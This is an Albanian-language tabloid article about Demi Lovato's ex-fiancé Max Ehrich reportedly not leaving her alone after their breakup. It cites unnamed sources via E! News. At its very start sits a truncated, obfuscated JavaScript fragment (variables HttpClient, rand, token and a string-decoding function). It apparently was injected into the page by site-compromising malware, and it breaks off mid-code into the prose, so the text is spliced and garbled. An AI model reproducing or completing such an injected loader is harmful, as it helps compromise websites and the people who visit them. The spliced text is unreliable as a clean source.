;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Ish i fejuari nuk po e lë Demi Lovaton rehat?

By

Demi Lovato është ndarë muajin e kaluar nga i fejuari i saj, Max Ehrich, pasi ishin të fejuar për dy muaj dhe tani po raportohet se ajo ka ca “çështje” me të.

Një burim i afërt em këngëtaren ka deklaruar se Max “nuk po e lë të qetë” pas ndarjes. Lajmi vjen vetëm një ditë pasi ai është parë me turinj varur në plazh, ku i kishe bërë propozimin për martesë gjatë kësaj vere.

Burimi ka thënë për E! News se Demi “ ka plot probleme meqë Max nuk po e lë të qetë.. Ai ka tentuar të kontaktojë me familjen dhe miqtë e saj dhe të gjithë këta e kanë bllokuar. Ajo tani është në kontakt me avokatët e saj në lidhje me atë se çfarë duhet të bëjë”.

Një burim tjetër i ka thënë revistës para ca javësh se Demi është e turpëruar nga ajo se si Max po e përjeton ndarjen. Ai kishte hyrë live në Instagram me datë 2 tetor dhe e kishte akuzuar atë se po e përdor ndarjen për publicitet.

“Demi nuk e do asnjë kontakt me Max në këtë pikë. Ajo është krejtësisht e turpëruar me mënyrën se si ai vepron dhe e ka vendosur lidhjen e tyre ‘në shpërthim’ me anë të rrjeteve sociale”, kishte thënë burimi. “Ajo nuk do të ketë asgjë me të”.

Artikuj të ngjashëm